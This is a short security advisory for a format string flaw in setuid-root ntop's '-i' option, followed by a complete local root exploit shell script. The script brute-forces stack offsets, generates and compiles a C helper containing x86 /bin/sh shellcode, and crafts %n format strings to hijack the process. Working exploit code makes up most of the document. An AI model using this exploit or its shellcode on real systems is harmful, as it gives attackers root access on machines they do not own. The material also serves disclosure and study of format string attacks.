source: https://www.securityfocus.com/bid/1840/info
ntop (network top) is a unix program used for displaying network usage statistics. It is often installed setuid root because it uses privileged ports.
ntop is vulnerable to a format string vulnerability that can compromise root access locally. If present, the argument to the "-i" command-line option is passed directly to a *printf function without being checked. It is thus possible for an attacker insert format specifiers that will be interpreted by the *printf function. Malicious format specifiers can cause the function to overwrite memory locations on the program's stack with user supplied data. This can lead to execution of arbitrary code with the effective privileges of the process (if setuid root, superuser privs).
########################## ntopexpl.sh ##########################
#!/bin/bash
# CONFIGURATION:
umask 000
target="/usr/sbin/ntop"
tmpdir="/tmp/"
# address we want to write to (ret on the stack)
# has to be an absolute address but we brute force
# this scanning 64 addresses from writeadr on
writeadr="0xbffff000"
# no. of addresses to scan
wrep=64
# address of the shell in our string
# must point somewhere to our 'nop' region
shadr="0xbffff320"
# number of nops before shellcode
declare -i nnops
nnops=128
echo
echo "-------------------------------------------"
echo "| ntop local r00t exploit |"
echo "| by IhaQueR |"
echo "| only for demonstrative purposes |"
echo "-------------------------------------------"
echo
echo
echo "configured for running $target"
echo "RETADR = $writeadr"
echo "SHELL = $shadr"
echo "NOPS = $nnops"
echo
# fake shellcode
shellfake="SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
# number of nops before shellcode
declare -i nnops
nnops=128
# make nop field
declare -i idx
idx=0
nfake=""
while test $idx -lt $nnops; do
nfake="N$nfake"
idx=$(($idx+1))
done;
# sanity check :-)
if ! test -x $target ; then
echo "[-] $target not found or not executable, sorry"
exit 1
fi;
echo "[+] found $target"
declare -i cnt
declare -i cntmax
cnt=0
cntmax=1024
# make string used for offset search
# like <head><addr><nops><shellcode>
# PP stands for padding
string="%0016d%x%0016d%d%0016d%d%0016d%dABCDEEEEFFFFGGGGHHHHIIIIJJJJKKKK${nfake}${shellfake}"
padding="PP"
declare -i npad
npad=2
gstring=""
# find offset
echo " now searching for offset"
echo
while test $cnt -le $cntmax ; do
gstring="%16g$gstring"
string="%16g$string"
cnt=$(($cnt+1))
result=$($target -i "$padding$string" 2>&1 | grep "44434241")
echo -n "[$cnt] "
if test "$result" != "" ; then
break;
fi;
done
# found offset
declare -i offset
offset=$(($cnt * 4))
echo
echo
if test $cnt -gt $cntmax ; then
echo "[-] offset not found, please tune padding :-)"
exit 2
fi;
echo "[+] OFFSET found to be $offset/$cnt"
echo " now constructing magic string"
# number of bytes written so far
declare -i nwrt
nwrt=$((16*${cnt} + ${npad}))
# bruteforce
echo "[+] string fileds prepared"
echo
cat <<__BRUTE__ >brute.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
// used with <string> <numwritten> <nops>
main(int argc, char** argv)
{
unsigned char str[8192];
unsigned char buf[8192];
unsigned char nop[1024];
unsigned addr[9];
unsigned char head[33]="%0016d%x%0016d%x%0016d%x%0016d%x";
// standard /bin/sh shell :-)
unsigned char hellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
int i, flip, nbrute;
unsigned char* ptr;
unsigned shadr, rtadr, nwrt;
int dn;
// construct string like <pad><eatstack><head><addr><nops><shell>
// no. of attempts
nbrute = $wrep;
// addr
rtadr = $writeadr;
while(nbrute>0) {
printf("[%4d] ", nbrute);
fflush(stdout);
fflush(stderr);
// nops
for(i=0; i<atol(argv[3]); i++)
nop[i] = 0x90;
nop[i] = 0;
// head
shadr = $shadr;
// 6 comes from "bind: "
nwrt = atol(argv[2]) + 6;
ptr = (unsigned char*)&shadr;
for(i=0; i<4; i++) {
flip = (((int)256) + ((int)ptr[i])) - ((int)(nwrt % 256));
nwrt = nwrt + flip;
sprintf(head+i*8, "%%%04dx%%n", flip);
}
head[32] = 0;
// address field
for(i=0; i<4; i++) {
addr[2*i] = rtadr + i;
addr[2*i+1] = rtadr + i;
}
addr[8] = 0;
sprintf(str, "%s%s%s%s%s", argv[1], head, addr, nop, hellcode);
sprintf(buf, "./ntop -i \"%s\"", str);
// kabuum
system(buf);
nbrute--;
rtadr += 4;
}
return 0;
}
__BRUTE__
rm -rf brute
gcc brute.c -o brute
if ! test -x brute ; then
echo "[-] compilation error, exiting"
exit 2
fi;
echo "[+] bruteforce prog prepared"
echo " now brute force"
echo
brute "$padding$gstring" ${nwrt} ${nnops}
echo ""
echo "[+] done"
echo ""